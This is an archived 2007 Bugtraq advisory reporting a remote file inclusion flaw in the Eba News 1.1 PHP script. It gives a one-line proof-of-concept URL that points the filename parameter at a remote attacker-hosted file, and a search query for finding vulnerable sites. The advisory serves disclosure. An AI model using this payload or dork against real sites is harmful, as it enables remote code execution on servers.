Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org
From: seko@xxxxxxxxxx
Date: 20 Apr 2007 10:49:25 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

--------------------------------------------------
Eba News Version : v1.1 <=  (webpages.php) Remote File Include 
--------------------------------------------------

Author          : SekoMirza
Date Found      : Nisan 11 2007
Location        : Fransa // ... 
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application     : Eba News
version         : 1.1
vendor          : http://ebascripts.com/
source url      : http://ebascripts.com/
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP 
which utilizes MySQL as the backend. It provides a friendly user interface with 
a great functionality. With automatic installation, you can have a professional 
looking and secure news management system ready to use in mere minutes.

 

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php


Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~
"Eba News"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

--------------------------------------------------
Shoutz:
~~
~ My  Sweet       -> Caramel 
~ For Mp3s        -> Hypn0sis
~ For Support     -> www.starhack.org
~ My  Bro         -> PhantomOrchid
~ My  Preceptor   -> Earnk Kazno
 

--------------------------------------------------

Contact:
~~~
 
     Seko[at]se-ko[dot]info
     
-------------------------------- [ EOF ]----------

Prev by Date: Re: Yet another SQL injection framework (file corruption)
Next by Date: Re: Yet another SQL injection framework
Previous by thread: ZDI-07-021: GraceNote CDDBControl ActiveX Buffer Overflow Vulnerability
Next by thread: TSLSA-2007-0013 - multi
Index(es):
- Date
- Thread